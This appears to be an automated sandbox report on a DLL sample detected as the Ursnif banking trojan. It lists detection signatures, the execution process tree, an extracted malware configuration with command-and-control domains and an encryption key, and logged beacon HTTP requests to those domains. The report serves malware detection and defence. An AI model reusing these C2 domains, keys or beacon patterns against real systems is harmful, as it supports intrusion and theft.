Loading ...

Play interactive tourEdit tour

Analysis Report 2ff0174.dll

Overview

General Information

Sample Name:2ff0174.dll
Analysis ID:431863
MD5:9f07670d0192eb4c2fa2dbafb6b3dddf
SHA1:0fac819049810a6707ce2269dd9cee6347b8ec7b
SHA256:a62876ad5b23476a42760a93bd502ce8d91d86a1fcbfa0f9edc673f4243a08f3
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected Ursnif
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6012 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2ff0174.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5360 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2ff0174.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4092 cmdline: rundll32.exe 'C:\Users\user\Desktop\2ff0174.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5988 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2ff0174.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5920 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 4084 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6136 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:82948 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6408 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17446 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 7156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17452 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2392 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17456 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6224 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17464 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 7112 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17472 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17482 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5088 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17488 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5184 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:83026 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17500 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3680 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:83040 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4852 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17514 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6928 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17520 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4644 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17524 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5584 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17530 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5132 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:17534 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4880 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5920 CREDAT:83092 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe C:\Users\user\Desktop\2ff0174.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "Hlj6FsCRmYLQM3DePAZKhqqkm2anmmatLYzzlHMToI9oQMsMAI9IbEz2bGdd+gr2u4VuQjeWYilfB/16/izG7wjz7L4W/Jko2VygJincvoQS9l5iG1bHubawsajm0EZr4kAGsqUOVptbNuiYmv9FF2NvtfBzvBKTABLE/vZO1hlYCpOb21WeAL0kkXf6wrbg", "c2_domain": ["mail.com", "vhfkffjddyjunekugjtr.xyz", "qtrweyuiopolkhgbjune.xyz"], "botnet": "5455", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.260584112.0000000002148000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.249635559.0000000005058000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.249696219.0000000005058000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.249777880.0000000005058000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.284826529.0000000004C98000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 31 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 2ff0174.dllAvira: detected
            Found malware configurationShow sources
            Source: 2.2.regsvr32.exe.10000000.3.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "Hlj6FsCRmYLQM3DePAZKhqqkm2anmmatLYzzlHMToI9oQMsMAI9IbEz2bGdd+gr2u4VuQjeWYilfB/16/izG7wjz7L4W/Jko2VygJincvoQS9l5iG1bHubawsajm0EZr4kAGsqUOVptbNuiYmv9FF2NvtfBzvBKTABLE/vZO1hlYCpOb21WeAL0kkXf6wrbg", "c2_domain": ["mail.com", "vhfkffjddyjunekugjtr.xyz", "qtrweyuiopolkhgbjune.xyz"], "botnet": "5455", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Machine Learning detection for sampleShow sources
            Source: 2ff0174.dllJoe Sandbox ML: detected
            Source: 2.2.regsvr32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 0.2.loaddll32.exe.10000000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 6.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 3.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 2ff0174.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.3:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49782 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49813 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49814 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49815 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49819 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49821 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49828 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49827 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49829 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49855 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.18.94:443 -> 192.168.2.3:49854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49875 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49876 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49878 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49877 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49884 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49883 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49885 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49886 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49889 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49890 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49891 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49892 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49899 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49900 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49902 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49901 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49904 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49903 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49906 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49905 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49912 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49911 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49913 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49914 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49918 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.3:49919 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49920 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.3:49921 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49927 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.3:49926 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49929 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.3:49928 version: TLS 1.2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01724C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_01724C3B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00AD4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00AD4C3B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04254C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_04254C3B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_029B4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,6_2_029B4C3B

            Networking:

            barindex
            Performs DNS queries to domains with low reputationShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: vhfkffjddyjunekugjtr.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: vhfkffjddyjunekugjtr.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: vhfkffjddyjunekugjtr.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: vhfkffjddyjunekugjtr.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: qtrweyuiopolkhgbjune.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: qtrweyuiopolkhgbjune.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: qtrweyuiopolkhgbjune.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: qtrweyuiopolkhgbjune.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: vhfkffjddyjunekugjtr.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: vhfkffjddyjunekugjtr.xyz
            Source: DNS query: vhfkffjddyjunekugjtr.xyz
            Source: DNS query: vhfkffjddyjunekugjtr.xyz
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewIP Address: 104.20.185.68 104.20.185.68
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /uripath/fcbslbaQpLGER/anAUxx7k/P6qNRF5XQyAjAahpDrcIJV_/2BFr8ewDzH/kQKcuAEadNq8bnSP3/wERFtfm7vyGn/vtnJWrjvx8a/3Jsty6cDbS_2BT/gpxDtVgwpd6fGwdYn6qs2/kmBHoYzJ0NzlB9tA/okgty4mo62PuQhI/vZTwR4IKuGhmX2McfB/4w9w6_2Bd/_2B3x_2Bn_2B/YKaqn.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uripath/WORqDY6_2BNfZ/KgWjiUUb/r87p6Orp_2Fmh0hHOaxhMMx/ttdOCXkBqo/vynRd5zf5hKBUtGNh/0ojVxeS0qGS0/kgLUoqcMUEo/HR5dFHbxXWkW5o/9wtG9IYf543FmlEl8G7Oe/tN_2FH_2FSXdL5Ee/kdKHsrNBEo9mT5n/OC3135hdYrpmFulc1o/ahW7bgseQVlR0vy/8zZARGC.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4; lang=en
            Source: global trafficHTTP traffic detected: GET /uripath/Dpso2yRgb0Dyb/KAn6cCpr/gAmXw5kfG_2Bc9ne1cJuUpm/vIdHSfsVJ8/z1jcayamlCKKrI29R/G_2B_2FccqD2/qf4e_2Fz6RI/K0AsHCwnacJmTs/dz3R8eKROUC_2FWQj5PLa/EqJtAUgFuyqujecx/FxvhHy9NhkNYETE/8xNMShuXbdh_2BRm2_/2BKALThQM/WfIVp4VFD/2fstwBtrQ/e.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/PbAYRrZYAKQJ_2FiZxLfQe/0W3TmhG_2FKNb/HT1zWvSh/WsU1_2F6i0huFYRA429S2ek/rkBd8Gm1wt/jPrgo3Qm1r_2FcnOo/wfKJYrVFbHaY/uPAV9mHMrKZ/jAk7myMZiDAmSQ/yOGTwTyxfld98bsDv53U4/FqusXxECzNJh4e3H/b3Q8IDIjGjZYWaI/QVKc4rs5AqW2/jMtBGa.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/E2bq2WZHjxXirUql/0j3wLqnWLhS_2FZ/sba7m_2B0uIP2xWYHL/1K7Ue7b7G/RDSt44BzYu1fE3VAPCUJ/9QPLsVrWwp160niu2b2/eq5dmXJov5C7F4b262v9FO/_2BKRjfeC1BxT/FFLUNvQ4/Tdu5jzZWgzD6sQniFWjnG4k/aiTESeJUr_/2BQ8CAw1bz7En6onW/NIK7zZLA/ci.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: vhfkffjddyjunekugjtr.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=f4ulcjh4ctpbrgokqf7lv9lpd4
            Source: global trafficHTTP traffic detected: GET /uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.ext HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /public/css/normalize.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/bootstrap.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/themify-icons.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
            Source: global trafficHTTP traffic detected: GET /public/css/lib/vector-map/jqvmap.min.css?1234 HTTP/1.1Accept: text/css, */*Referer: http://qtrweyuiopolkhgbjune.xyz/uripath/RgELBgMDUcLhX5wa_2BM/oftXg3zUOP3XNM8SzTE/il9BuzYmJ5GFlNygEzpohc/MPdtsYKQkNO4c/wkH4vJBP/Kc9NP9666_2Bsm2t4fFrVeM/Cje7KYUUkw/NwW99YvrzitdFW1CD/j_2F_2FvODtq/RqYshwP1aCJ/ht7YVvE6QxeJ_2/BXjQMi_2FBpQDANLtyu38/CN5k2RVP/U7O0rH.extAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: qtrweyuiopolkhgbjune.xyzConnection: Keep-AliveCookie: PHPSESSID=dmi68ara3doq4fg6ve69gv8ck5; lang=en
